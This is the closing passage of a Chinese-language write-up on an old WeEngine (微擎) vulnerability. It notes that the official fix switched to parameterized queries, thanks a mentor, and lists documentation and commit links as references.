官⽅修复⽅式如下: 改成了微擎⾃带的参数化查询。 0x07 写在最后 由于这个是⽼洞了,所以在搭建上坑点不少,但是漏洞很好理解。 最后感谢续师傅的指导,周末还继续带我学习(膜~ 0x08 参考 https://www.kancloud.cn/donknap/we7/134649 https://www.kancloud.cn/hl449006540/we-engine-datasheet/1103542 https://wiki.w7.cc/chapter/35?id=507 https://gitee.com/we7coreteam/pros/commit/1f5ffb82836f7602f3acbaf9e93e9aa087c93579)